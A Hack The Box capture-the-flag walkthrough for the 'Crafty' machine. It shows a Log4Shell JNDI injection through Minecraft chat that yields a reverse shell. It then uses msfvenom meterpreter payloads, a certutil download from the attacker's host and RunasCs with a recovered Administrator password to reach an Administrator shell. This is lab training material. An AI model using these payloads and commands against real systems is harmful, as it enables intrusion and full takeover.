Hack The Box - Crafty

05 May 2024 . tech . Comments
#tutorial

Reconnaissance and Initial Steps

Nmap Results

nmap 10.10.11.249 -p-

image

sudo nmap -p80,25565 -sV -sC 10.10.11.249

image

I add crafty to /etc/hosts with the corresponding ip address given. Then navigate to http://crafty.htb

echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts

When I visited crafty.htb, I found a Minecraft introduction page.

image

Foothold

However, for port 25565, I recall there being a log4j vulnerability, CVE-2021–44228 to be precise. This exploit enables control over log messages and parameters to execute arbitrary code. An exploit for this vulnerability can be found here.

git clone https://github.com/kozmer/log4j-shell-poc

image

Modify the String cmd variable to ensure compatibility with Windows.

image

In order for poc.py to run smoothly we need a java archive to be named jdk1.8.0_20. I found a java archive here

wget https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz
tar -xf jdk-8u181-linux-x64.tar.gz
mv jdk1.8.0_181 jdk1.8.0_20

image

To connect to the server, I needed to download the Minecraft client on my Kali system. After conducting some research, I downloaded TLauncher. https://tlauncher.org/en/download_1/minecraft-1-16-5_12582.html (I don’t recommend using this, but I proceeded anyway since I’m installing it on a VM.) And I used Minecraft 1.16.5 Java Edition as I knew it’s vulnerable to log4j.

one download the TLauncher.zip file, unzip it and open it by runing below command:

sudo java -jar TLauncher.jar

image

image

after that select the correct release version and fill the minecraft account name, then procced on Enter the game.

image

Clicking on Multiplayer allowed me to enter the server.

image

10.10.11.249:25565

image

I had to attempt logging in to the server multiple times, and each time I had to reset the box for it to function properly. Once I login to the server, I opened a terminal and ran the POC. and it will show a command (${jndi:ldap://10.10.16.18:1389/a}) I copied that.

python3 poc.py --userip <tun0 IP> --webport 80 --lport 4444

and open another terminal and create a netcat listener on port 4444

nc -nlvp 4444

then in minecraft, I press t (to send a message) and in the chat box i paste that copied command (${jndi:ldap://10.10.16.18:1389/a}), so in few second i got the reverse shell in my netcat listener.

image

image

in below screenshot you can see the whole process:

image

user.txt

So now we can obtain the user.txt

image

Privilege Escalation

While exploring the machine, I stumbled upon an interesting .jar file located in C:\Users\svc_minecraft\server\plugins.

image

With my current shell I can’t download the file so I followed blow steps:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4244 -f exe -o exploit.exe

image

I then fired up Metasploit and did the following:

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4244
run

image

then spin up a python server on a separate tab to deliver exploit.exe.

python3 -m http.server 4245

Then run below command in the on the foothold shell. This command will grab the msfvenom exploit.exe and put it on the target machine.

certutil -urlcache -f http://10.10.16.18:4245/exploit.exe %temp%/exploit.exe

image

Then run the exploit.exe.

start %temp%/exploit.exe

image

BOOM! We got a stable shell through meterpreter. so now we can download the jar file.

image

If we want to find out what is in this file we need a Java Decompiler. The command for one is jd-gui and it is built into kali. This will open up a the decompiler for you. Click on File in the top right and click Open File. Find the .jar file and open it up.

sudo apt install jd-gui

image

image

By opening this file with JD-GUI, I found a credential in the Playercounter.class.

Now We are going to use RunasCs which will allow us to run processes with different permissions that the ones we currently have. The goal is to initiate an Administrator shell from our current user svc_minecraft.

https://github.com/antonioCoco/RunasCs/releases

Download the version 1.5 RunasCs.zip from the embed above and run an unzip on it. We are going to be using the RunasCs.exe for this box.

Now create another msfvenom payload but for another port 4246.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.18 LPORT=4246 -f exe -o exploit2.exe

image

On the meterpreter session you can try uploading to \server\plugins but it won’t work because of permissions. We need to make our way over to \server\logs so we can upload the new payload exploit2.exe and RunasCs.exe.

image

Open a new tab and launch Metasploit by typing msfconsole. Repeat the procedure from the previous Metasploit segment, this time configuring it to operate on port 4246. (listener)

sudo msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.16.18
set lport 4246
run

image

Returning to our previous Meterpreter shell, execute the following commands:

.\RunasCs.exe Administrator s67u84zKq8IXw exploit2.exe

image

BOOM!! We got the Administrator shell. as well as root flag !!!

image

Me

c0d3cr4f73r is a cybersecurity enthusiast with a passion for red teaming and malware analysis. Based in Dubai, c0d3cr4f73r has extensive experience in offensive security operations. In their free time, they enjoy diving into the latest cybersecurity challenges.